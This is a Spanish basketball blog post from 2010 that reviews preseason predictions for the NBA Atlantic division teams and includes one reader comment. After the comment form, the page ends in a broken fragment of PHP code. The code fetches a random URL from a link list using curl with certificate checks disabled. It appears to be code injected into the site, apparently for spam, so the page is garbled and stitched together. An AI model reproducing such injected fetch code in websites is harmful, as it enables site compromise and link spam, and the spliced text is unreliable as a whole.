Revisando los pronósticos t2010: Atlantic

19 de February de 2010 por TheDeerHunter

Boston Celtics: Nuestro analista les definía como la mejor plantilla en manos de un gran técnico como Doc Rivers. Destacaba las contadas pero importantes incorporaciones y señalaba el estado físico de Garnett como única “nubecilla gris” en el horizonte de recuperar el trono de la liga de manos del imperio mediático amarillo. Pleno en el pronóstico del Quinteto y 6º hombre, pero con el estado de Garnett a la vista parece complicado la culminación del campeonato, aún con la incorporación de Robinson.

Lo mejor: Rajon Rondo es el mejor base del Este hasta el momento. Él es el futuro. Rasheed Wallace se ha adaptado bien a su nuevo equipo. Con todos los problemas siguen estando ahí arriba.

Lo peor: La cojera de Garnett, el rendimiento de Pierce y, sobre todo, de Ray Allen. Demasiada gente del entorno ha pedido abiertamente su cabeza. Muchos dan este proyecto por acabado.

Toronto Raptors: Destacábamos las internacionales incorporaciones de Turkoglu, Jack, Bellinelli, Amir Johnson o Nesterovic. Cuestionábamos el dineral gastado en el turco y en Bargnani y poníamos muy en duda la continuidad de Bosh, como también la consecución de los playoffs. Una temporada crítica para Calderón.

Las cosas en lo individual no le están saliendo demasiado bien al extremeño. No termina de cuajar con  Turkoglu, que tampoco ha encontrado su juego. Precísamente ha sido Jack el fichaje más rentable de este año. Todo unido a los problemas físicos ha terminado con la pérdida de peso específico hasta el punto de haberse valorado seriamente su traspaso.

En lo colectivo muy bien, porque el Este no es tan fiero como lo pintábamos y la temporada está siendo asombrosamente cómoda, con un Chris Bosh en estado de gracia. No llegamos a acertar el reparto de minutos, como tampoco, la facilidad con la que están asegurando su plaza para postemporada.

Lo mejor: Chris Bosh está siendo el jugador franquicia que muchos le han cuestionado ser. El equipo está cumpliendo sobradamente el objetivo de volver a playoffs aunque la 2ª ronda se antoja complicada.

Lo peor: Las incorporaciones, quitando a Jack, no han terminado de cuajar. Calderón tampoco ha estado fino. Una probable derrota en primera ronda puede significar el fin del proyecto.

Philadelphia 76ers: Una de las decepciones del campeonato. Han tenido que repescar a un Iverson pseudo-retirado para evitar un naufragio todavía mayor. Del fracaso de temporada nadie puede salvarles con un rendimiento muy irregular de los Iguodala, Brand y Young, como teóricos líderes así como lo que les ha desorientado la pérdida de André Miller.

En el reparto de minutos de los titulares no andamos demasiado desencaminados, si no tenemos en cuenta la incorporación de AI3. Kapono no ha terminado siendo en ningún caso 6º hombre y el pronóstico de dar la campanada en 1º ronda nos parece ahora poco menos que un delirio.

Lo mejor: Para los nostálgicos de Philly la vuelta del hijo pródigo Iverson. No está siendo de los peores del equipo, ni mucho menos.

Lo peor: Con la larga lesión de Louis Williams se destaparon todas las vergüenzas de este equipo. André Miller ha sido vital estos años.  Brand, tristemente, todo lo contrario. Reconstrucción inminente… otra vez.

New York Knicks: Cuando no se espera mucho es fácil cumplir con las expectativas. Nadie ha engañado a nadie con el objetivo del 2010. Mucho mérito por parte de Donnie Walsh en lo que se refiere a poner los mimbres de hueco salarial porque la herencia era muy negra. Hasta las últimos movimientos por todos conocidos tienen gran nivel de coherencia. Es cierto que algunos “ilusos” creíamos que la mano de D’Antoni y la espina dorsal del equipo daba para mejor rendimiento. Y esa imagen irregular es ahora la principal interferencia al efecto llamada de tanta pasta sobre la mesa.

Hacer un pronóstico sobre el quinteto en esta tesitura era poco menos que suicida. No tanto lo de que se quedan fuera de playoffs. En eso acertamos. ¿Somos muy buenos o qué?

Lo mejor: David Lee es un más que buen punto de apoyo sobre el que podrá sustentarse ese utópico eden que compone el proyecto compuesto por los mejores agentes libres del próximo verano.  Harrington, Chandler, Gallinari… son buenas piezas. Lo mejor de todo es que apenas queda ningún cáncer de Isiah en el equipo. Y ha pasado el tiempo justo para llegar al momento más adecuado para gastar montañas de pasta en ellos.

Lo peor: Un 35% de victorias no es la mejor carta de presentación para deslumbrar a nadie para que termine el año que viene en tu equipo. A parte de billetes verdes, lujo y mujeres algunos jugadores pretenden incluso ganar títulos. Sobre todo los buenos.

New Jersey Nets: No es que mostráramos una audacia sin precedentes pronosticándoles tener acceso a un pick de lotería pero es que ni en nuestras más horrendas pesadillas pensaríamos que este equipo iba a mostrar esta pésima imagen. Es que sólo con la progresión que mostraron Harris y Brook López el año pasado ya tenías un equipo apañado. Se infravaloró quizás la aportación del experimentado Vince Carter en los buenos momentos que tuvieron entonces.

Esta franquicia es una ruina a todos los niveles y lo único que les hará salir de la penosa situación en la que se encuentran serán los billetes de cierto magnate ruso y la mudanza al barrio de Brooklyn.

Lo mejor: Que no televisan demasiados partidos de ellos.

Lo peor: Ellos son lo peor… de toda la historia. Ya tiene mérito.

Comenta

Un comentario a esta entrada

  1. Gastón dice:
    #1

    Tengo unas ganas increibles de ver los fichajes de este verano por parte de los Knicks, me huele a mi que los Cavs tendran un nuevo batacazo y Lebron movera ficha.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>